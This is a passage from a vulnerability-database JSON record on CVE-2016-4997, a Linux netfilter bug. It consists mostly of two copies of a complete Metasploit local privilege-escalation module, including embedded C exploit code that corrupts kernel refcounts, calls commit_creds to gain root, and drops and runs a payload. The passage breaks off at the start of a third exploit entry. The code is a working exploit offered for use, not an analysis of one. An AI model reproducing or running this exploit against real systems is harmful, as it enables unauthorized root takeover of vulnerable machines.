"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26412"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:53", "description": "", "published": "2016-09-27T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-09-27T00:00:00", "id": "PACKETSTORM:138854", "href": "https://packetstormsecurity.com/files/138854/Linux-Kernel-4.6.3-Netfilter-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire \"msf/core\" \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', \n'Description' => %q{ \nThis module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently \nonly works against Ubuntu 16.04 (not 16.04.1) with kernel \n4.4.0-21-generic. \nSeveral conditions have to be met for successful exploitation: \nUbuntu: \n1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) \n2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile \nKernel 4.4.0-31-generic and newer are not vulnerable. \n \nWe write the ascii files and compile on target instead of locally since metasm bombs for not \nhaving cdefs.h (even if locally installed) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die <mike@stcyrsecurity.com>', # Module \n'vnik' # Discovery \n], \n'DisclosureDate' => 'Jun 03 2016', \n'Platform' => [ 'linux'], \n'Arch' => [ ARCH_X86 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Ubuntu', { } ] \n#[ 'Fedora', { } ] \n], \n'DefaultTarget' => 0, \n'References' => \n[ \n[ 'EDB', '40049'], \n[ 'CVE', '2016-4997'], \n[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'] \n] \n)) \nregister_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), \nOptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]), \nOptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) \n], self.class) \nend \n \ndef check \ndef iptables_loaded?() \n# user@ubuntu:~$ cat /proc/modules | grep ip_tables \n# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000 \n# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000 \nvprint_status('Checking if ip_tables is loaded in kernel') \nif target.name == \"Ubuntu\" \niptables = cmd_exec('cat /proc/modules | grep ip_tables') \nif iptables.include?('ip_tables') \nvprint_good('ip_tables.ko is loaded') \nelse \nprint_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('ip_tables') \nelsif target.name == \"Fedora\" \niptables = cmd_exec('cat /proc/modules | grep iptable_raw') \nif iptables.include?('iptable_raw') \nvprint_good('iptable_raw is loaded') \nelse \nprint_error('iptable_raw is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('iptable_raw') \nelse \nreturn false \nend \nend \n \ndef shemsham_installed?() \n# we want this to be false. \nvprint_status('Checking if shem or sham are installed') \nshemsham = cmd_exec('cat /proc/cpuinfo') \nif shemsham.include?('shem') \nprint_error('shem installed, system not vulnerable.') \nelsif shemsham.include?('sham') \nprint_error('sham installed, system not vulnerable.') \nelse \nvprint_good('shem and sham not present.') \nend \nreturn (shemsham.include?('shem') or shemsham.include?('sham')) \nend \n \nif iptables_loaded?() and not shemsham_installed?() \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \n# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. \ndef has_prereqs?() \nvprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed') \nif target.name == \"Ubuntu\" \nlib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386') \nif lib.include?('install') \nvprint_good('libc6-dev-i386 is installed') \nelse \nprint_error('libc6-dev-i386 is not installed. Compiling will fail.') \nend \nmultilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib') \nif multilib.include?('install') \nvprint_good('gcc-multilib is installed') \nelse \nprint_error('gcc-multilib is not installed. Compiling will fail.') \nend \ngcc = cmd_exec('which gcc') \nif gcc.include?('gcc') \nvprint_good('gcc is installed') \nelse \nprint_error('gcc is not installed. Compiling will fail.') \nend \nreturn gcc.include?('gcc') && lib.include?('install') && multilib.include?('install') \nelsif target.name == \"Fedora\" \nlib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'') \nif lib.include?('glibc') \nvprint_good('glibc-devel.i686 is installed') \nelse \nprint_error('glibc-devel.i686 is not installed. Compiling will fail.') \nend \nif lib.include?('libgcc') \nvprint_good('libgcc.i686 is installed') \nelse \nprint_error('libgcc.i686 is not installed. Compiling will fail.') \nend \nmultilib = false #not implemented \ngcc = false #not implemented \nreturn (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib \nelse \nreturn false \nend \nend \n \ncompile = false \nif datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' \nif has_prereqs?() \ncompile = true \nvprint_status('Live compiling exploit on system') \nelse \nvprint_status('Dropping pre-compiled exploit on system') \nend \nend \nif check != CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') \nend \n \ndesc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \nenv_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npayload_file = rand_text_alpha(8) \npayload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\" \n \n# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here \n# removed #include <netinet/in.h> per busterb comment in PR 7326 \ndecr = %q{ \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <sched.h> \n#include <netinet/in.h> \n#include <linux/sched.h> \n#include <errno.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <sys/ptrace.h> \n#include <net/if.h> \n#include <linux/netfilter_ipv4/ip_tables.h> \n#include <linux/netlink.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n \n#define MALLOC_SIZE 66*1024 \n \nint decr(void *p) { \nint sock, optlen; \nint ret; \nvoid *data; \nstruct ipt_replace *repl; \nstruct ipt_entry *entry; \nstruct xt_entry_match *ematch; \nstruct xt_standard_target *target; \nunsigned i; \n \nsock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); \n \nif (sock == -1) { \nperror(\"socket\"); \nreturn -1; \n} \n \ndata = malloc(MALLOC_SIZE); \n \nif (data == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nmemset(data, 0, MALLOC_SIZE); \n \nrepl = (struct ipt_replace *) data; \nrepl->num_entries = 1; \nrepl->num_counters = 1; \nrepl->size = sizeof(*repl) + sizeof(*target) + 0xffff; \nrepl->valid_hooks = 0; \n \nentry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); \nentry->target_offset = 74; // overwrite target_offset \nentry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); \n \nematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); \n \nstrcpy(ematch->u.user.name, \"icmp\"); \nvoid *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); \nuint64_t *me = (uint64_t *)(kmatch + 0x58); \n*me = 0xffffffff821de10d; // magic number! \n \nuint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); \n*match = (uint32_t)kmatch; \n \nematch->u.match_size = (short)0xffff; \n \ntarget = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); \nuint32_t *t = (uint32_t *)target; \n*t = (uint32_t)kmatch; \n \nprintf(\"[!] Decrementing the refcount. This may take a while...\\n\"); \nprintf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\"); \n \nfor (i = 0; i < 0xffffff/2+1; i++) { \nret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); \n} \n \nclose(sock); \nfree(data); \nprintf(\"[+] Done! Now run ./pwn\\n\"); \n \nreturn 0; \n} \n \nint main(void) { \nvoid *stack; \nint ret; \n \nprintf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\"); \n \nret = unshare(CLONE_NEWUSER); \n \nif (ret == -1) { \nperror(\"unshare\"); \nreturn -1; \n} \n \nstack = (void *) malloc(65536); \n \nif (stack == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nclone(decr, stack + 65536, CLONE_NEWNET, NULL); \n \nsleep(1); \n \nreturn 0; \n} \n} \n \n# direct copy of code from exploit-db \npwn = %q{ \n#include <stdio.h> \n#include <string.h> \n#include <errno.h> \n#include <unistd.h> \n#include <stdint.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n#include <assert.h> \n \n#define MMAP_ADDR 0xff814e3000 \n#define MMAP_OFFSET 0xb0 \n \ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); \ntypedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); \n \nvoid __attribute__((regparm(3))) privesc() { \ncommit_creds_fn commit_creds = (void *)0xffffffff810a21c0; \nprepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; \ncommit_creds(prepare_kernel_cred((uint64_t)NULL)); \n} \n \nint main() { \nvoid *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); \nassert(payload == (void *)MMAP_ADDR); \n \nvoid *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); \n \nmemset(shellcode, 0, 0x300000); \n \nvoid *ret = memcpy(shellcode, &privesc, 0x300); \nassert(ret == shellcode); \n \nprintf(\"[+] Escalating privs...\\n\"); \n \nint fd = open(\"/dev/ptmx\", O_RDWR); \nclose(fd); \n \nassert(!getuid()); \n \nprintf(\"[+] We've got root!\"); \n \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n} \n \n# the original code printed a line. However, this is hard to detect due to threading. \n# so instead we can write a file in /tmp to catch. \ndecr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/, \n\"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" ) \n \n# patch in to run our payload \npwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/, \n\"execl(\\\"#{payload_path}\\\", NULL);\") \n \ndef pwn(payload_path, pwn_file, pwn, compile) \n# lets write our payload since everythings set for priv esc \nvprint_status(\"Writing payload to #{payload_path}\") \nwrite_file(payload_path, generate_payload_exe) \ncmd_exec(\"chmod 555 #{payload_path}\") \nregister_file_for_cleanup(payload_path) \n \n# now lets drop part 2, and finish up. \nrm_f pwn_file \nif compile \nprint_status \"Writing pwn executable to #{pwn_file}.c\" \nrm_f \"#{pwn_file}.c\" \nwrite_file(\"#{pwn_file}.c\", pwn) \ncmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\") \nregister_file_for_cleanup(\"#{pwn_file}.c\") \nelse \nprint_status \"Writing pwn executable to #{pwn_file}\" \nwrite_file(pwn_file, pwn) \nend \nregister_file_for_cleanup(pwn_file) \ncmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\") \nend \n \nif not compile # we need to override with our pre-created binary \n# pwn file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') \nfd = ::File.open( path, \"rb\") \npwn = fd.read(fd.stat.size) \nfd.close \n# desc file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') \nfd = ::File.open( path, \"rb\") \ndecr = fd.read(fd.stat.size) \nfd.close \n \n# overwrite the hardcoded variable names in the compiled versions \nenv_ready_file = '/tmp/okDjTFSS' \npayload_path = '/tmp/2016_4997_payload' \nend \n \n# check for shortcut \nif datastore['REEXPLOIT'] \npwn(payload_path, pwn_file, pwn, compile) \nelse \nrm_f desc_file \nif compile \nprint_status \"Writing desc executable to #{desc_file}.c\" \nrm_f \"#{desc_file}.c\" \nwrite_file(\"#{desc_file}.c\", decr) \nregister_file_for_cleanup(\"#{desc_file}.c\") \noutput = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\") \nelse \nwrite_file(desc_file, decr) \nend \nrm_f env_ready_file \nregister_file_for_cleanup(env_ready_file) \n#register_file_for_cleanup(desc_file) \nif not file_exist?(desc_file) \nvprint_error(\"gcc failure output: #{output}\") \nfail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\") \nend \nif target.name == \"Ubuntu\" \nvprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\" \nelsif target.name == \"Fedora\" \nvprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\" \nend \ncmd_exec(\"chmod +x #{desc_file}; #{desc_file}\") \nsec_waited = 0 \n \nuntil sec_waited > datastore['MAXWAIT'] do \nRex.sleep(1) \nif sec_waited % 10 == 0 \nvprint_status(\"Waited #{sec_waited}s so far\") \nend \n \nif file_exist?(env_ready_file) \nprint_good(\"desc finished, env ready.\") \npwn(payload_path, pwn_file, pwn, compile) \nreturn \nend \nsec_waited +=1 \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138854/netfilter_priv_esc.rb.txt"}, {"lastseen": "2016-12-05T22:17:47", "description": "", "published": "2016-11-23T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-11-23T00:00:00", "id": "PACKETSTORM:139880", "href": "https://packetstormsecurity.com/files/139880/Linux-Kernel-4.6.3-Netfilter-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire \"msf/core\" \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', \n'Description' => %q{ \nThis module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently \nonly works against Ubuntu 16.04 (not 16.04.1) with kernel \n4.4.0-21-generic. \nSeveral conditions have to be met for successful exploitation: \nUbuntu: \n1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) \n2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile \nKernel 4.4.0-31-generic and newer are not vulnerable. \n \nWe write the ascii files and compile on target instead of locally since metasm bombs for not \nhaving cdefs.h (even if locally installed) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die <mike@stcyrsecurity.com>', # Module \n'vnik' # Discovery \n], \n'DisclosureDate' => 'Jun 03 2016', \n'Platform' => [ 'linux'], \n'Arch' => [ ARCH_X86 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Ubuntu', { } ] \n#[ 'Fedora', { } ] \n], \n'DefaultTarget' => 0, \n'References' => \n[ \n[ 'EDB', '40049'], \n[ 'CVE', '2016-4997'], \n[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'] \n] \n)) \nregister_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), \nOptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]), \nOptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) \n], self.class) \nend \n \ndef check \ndef iptables_loaded?() \n# user@ubuntu:~$ grep ip_tables /proc/modules \n# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000 \n# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000 \nvprint_status('Checking if ip_tables is loaded in kernel') \nif target.name == \"Ubuntu\" \niptables = read_file('/proc/modules') \nif iptables.include?('ip_tables') \nvprint_good('ip_tables.ko is loaded') \nelse \nprint_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('ip_tables') \nelsif target.name == \"Fedora\" \niptables = read_file('/proc/modules') \nif iptables.include?('iptable_raw') \nvprint_good('iptable_raw is loaded') \nelse \nprint_error('iptable_raw is not loaded. root needs to run iptables -L or similar command') \nend \nreturn iptables.include?('iptable_raw') \nelse \nreturn false \nend \nend \n \ndef shemsham_installed?() \n# we want this to be false. \nvprint_status('Checking if shem or sham are installed') \nshemsham = read_file('/proc/cpuinfo') \nif shemsham.include?('shem') \nprint_error('shem installed, system not vulnerable.') \nelsif shemsham.include?('sham') \nprint_error('sham installed, system not vulnerable.') \nelse \nvprint_good('shem and sham not present.') \nend \nreturn (shemsham.include?('shem') or shemsham.include?('sham')) \nend \n \nif iptables_loaded?() and not shemsham_installed?() \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \n# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. \ndef has_prereqs?() \nvprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed') \nif target.name == \"Ubuntu\" \nlib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386') \nif lib.include?('install') \nvprint_good('libc6-dev-i386 is installed') \nelse \nprint_error('libc6-dev-i386 is not installed. Compiling will fail.') \nend \nmultilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib') \nif multilib.include?('install') \nvprint_good('gcc-multilib is installed') \nelse \nprint_error('gcc-multilib is not installed. Compiling will fail.') \nend \ngcc = cmd_exec('which gcc') \nif gcc.include?('gcc') \nvprint_good('gcc is installed') \nelse \nprint_error('gcc is not installed. Compiling will fail.') \nend \nreturn gcc.include?('gcc') && lib.include?('install') && multilib.include?('install') \nelsif target.name == \"Fedora\" \nlib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'') \nif lib.include?('glibc') \nvprint_good('glibc-devel.i686 is installed') \nelse \nprint_error('glibc-devel.i686 is not installed. Compiling will fail.') \nend \nif lib.include?('libgcc') \nvprint_good('libgcc.i686 is installed') \nelse \nprint_error('libgcc.i686 is not installed. Compiling will fail.') \nend \nmultilib = false #not implemented \ngcc = false #not implemented \nreturn (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib \nelse \nreturn false \nend \nend \n \ncompile = false \nif datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' \nif has_prereqs?() \ncompile = true \nvprint_status('Live compiling exploit on system') \nelse \nvprint_status('Dropping pre-compiled exploit on system') \nend \nend \nif check != CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') \nend \n \ndesc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \nenv_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) \npayload_file = rand_text_alpha(8) \npayload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\" \n \n# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here \n# removed #include <netinet/in.h> per busterb comment in PR 7326 \ndecr = %q{ \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <sched.h> \n#include <netinet/in.h> \n#include <linux/sched.h> \n#include <errno.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <sys/ptrace.h> \n#include <net/if.h> \n#include <linux/netfilter_ipv4/ip_tables.h> \n#include <linux/netlink.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n \n#define MALLOC_SIZE 66*1024 \n \nint decr(void *p) { \nint sock, optlen; \nint ret; \nvoid *data; \nstruct ipt_replace *repl; \nstruct ipt_entry *entry; \nstruct xt_entry_match *ematch; \nstruct xt_standard_target *target; \nunsigned i; \n \nsock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); \n \nif (sock == -1) { \nperror(\"socket\"); \nreturn -1; \n} \n \ndata = malloc(MALLOC_SIZE); \n \nif (data == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nmemset(data, 0, MALLOC_SIZE); \n \nrepl = (struct ipt_replace *) data; \nrepl->num_entries = 1; \nrepl->num_counters = 1; \nrepl->size = sizeof(*repl) + sizeof(*target) + 0xffff; \nrepl->valid_hooks = 0; \n \nentry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); \nentry->target_offset = 74; // overwrite target_offset \nentry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); \n \nematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); \n \nstrcpy(ematch->u.user.name, \"icmp\"); \nvoid *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); \nuint64_t *me = (uint64_t *)(kmatch + 0x58); \n*me = 0xffffffff821de10d; // magic number! \n \nuint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); \n*match = (uint32_t)kmatch; \n \nematch->u.match_size = (short)0xffff; \n \ntarget = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); \nuint32_t *t = (uint32_t *)target; \n*t = (uint32_t)kmatch; \n \nprintf(\"[!] Decrementing the refcount. This may take a while...\\n\"); \nprintf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\"); \n \nfor (i = 0; i < 0xffffff/2+1; i++) { \nret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); \n} \n \nclose(sock); \nfree(data); \nprintf(\"[+] Done! Now run ./pwn\\n\"); \n \nreturn 0; \n} \n \nint main(void) { \nvoid *stack; \nint ret; \n \nprintf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\"); \n \nret = unshare(CLONE_NEWUSER); \n \nif (ret == -1) { \nperror(\"unshare\"); \nreturn -1; \n} \n \nstack = (void *) malloc(65536); \n \nif (stack == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nclone(decr, stack + 65536, CLONE_NEWNET, NULL); \n \nsleep(1); \n \nreturn 0; \n} \n} \n \n# direct copy of code from exploit-db \npwn = %q{ \n#include <stdio.h> \n#include <string.h> \n#include <errno.h> \n#include <unistd.h> \n#include <stdint.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n#include <assert.h> \n \n#define MMAP_ADDR 0xff814e3000 \n#define MMAP_OFFSET 0xb0 \n \ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); \ntypedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); \n \nvoid __attribute__((regparm(3))) privesc() { \ncommit_creds_fn commit_creds = (void *)0xffffffff810a21c0; \nprepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; \ncommit_creds(prepare_kernel_cred((uint64_t)NULL)); \n} \n \nint main() { \nvoid *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); \nassert(payload == (void *)MMAP_ADDR); \n \nvoid *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); \n \nmemset(shellcode, 0, 0x300000); \n \nvoid *ret = memcpy(shellcode, &privesc, 0x300); \nassert(ret == shellcode); \n \nprintf(\"[+] Escalating privs...\\n\"); \n \nint fd = open(\"/dev/ptmx\", O_RDWR); \nclose(fd); \n \nassert(!getuid()); \n \nprintf(\"[+] We've got root!\"); \n \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n} \n \n# the original code printed a line. However, this is hard to detect due to threading. \n# so instead we can write a file in /tmp to catch. \ndecr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/, \n\"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" ) \n \n# patch in to run our payload \npwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/, \n\"execl(\\\"#{payload_path}\\\", NULL);\") \n \ndef pwn(payload_path, pwn_file, pwn, compile) \n# lets write our payload since everythings set for priv esc \nvprint_status(\"Writing payload to #{payload_path}\") \nwrite_file(payload_path, generate_payload_exe) \ncmd_exec(\"chmod 555 #{payload_path}\") \nregister_file_for_cleanup(payload_path) \n \n# now lets drop part 2, and finish up. \nrm_f pwn_file \nif compile \nprint_status \"Writing pwn executable to #{pwn_file}.c\" \nrm_f \"#{pwn_file}.c\" \nwrite_file(\"#{pwn_file}.c\", pwn) \ncmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\") \nregister_file_for_cleanup(\"#{pwn_file}.c\") \nelse \nprint_status \"Writing pwn executable to #{pwn_file}\" \nwrite_file(pwn_file, pwn) \nend \nregister_file_for_cleanup(pwn_file) \ncmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\") \nend \n \nif not compile # we need to override with our pre-created binary \n# pwn file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') \nfd = ::File.open( path, \"rb\") \npwn = fd.read(fd.stat.size) \nfd.close \n# desc file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') \nfd = ::File.open( path, \"rb\") \ndecr = fd.read(fd.stat.size) \nfd.close \n \n# overwrite the hardcoded variable names in the compiled versions \nenv_ready_file = '/tmp/okDjTFSS' \npayload_path = '/tmp/2016_4997_payload' \nend \n \n# check for shortcut \nif datastore['REEXPLOIT'] \npwn(payload_path, pwn_file, pwn, compile) \nelse \nrm_f desc_file \nif compile \nprint_status \"Writing desc executable to #{desc_file}.c\" \nrm_f \"#{desc_file}.c\" \nwrite_file(\"#{desc_file}.c\", decr) \nregister_file_for_cleanup(\"#{desc_file}.c\") \noutput = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\") \nelse \nwrite_file(desc_file, decr) \nend \nrm_f env_ready_file \nregister_file_for_cleanup(env_ready_file) \n#register_file_for_cleanup(desc_file) \nif not file_exist?(desc_file) \nvprint_error(\"gcc failure output: #{output}\") \nfail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\") \nend \nif target.name == \"Ubuntu\" \nvprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\" \nelsif target.name == \"Fedora\" \nvprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\" \nend \ncmd_exec(\"chmod +x #{desc_file}; #{desc_file}\") \nsec_waited = 0 \n \nuntil sec_waited > datastore['MAXWAIT'] do \nRex.sleep(1) \nif sec_waited % 10 == 0 \nvprint_status(\"Waited #{sec_waited}s so far\") \nend \n \nif file_exist?(env_ready_file) \nprint_good(\"desc finished, env ready.\") \npwn(payload_path, pwn_file, pwn, compile) \nreturn \nend \nsec_waited +=1 \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139880/netfilter_priv_esc_ipv4.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Local Privilege Escalation", "edition": 1, "published": "2016-10-10T00:00:00", "title": "Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-10-10T00:00:00", "id": "EXPLOITPACK:9D752285F4A2795E32FB57E31FD31AB0", "href": "", "sourceData": "# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call\n# Date: 2016.10.8\n# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360\n# Version: Linux kernel <= 4.6.2\n# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic\n# CVE: CVE-2016-4997\n# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10\n# Contact: tyrande000@gmail.com\n\n#DESCRIPTION\n#===========\n#The IPv6 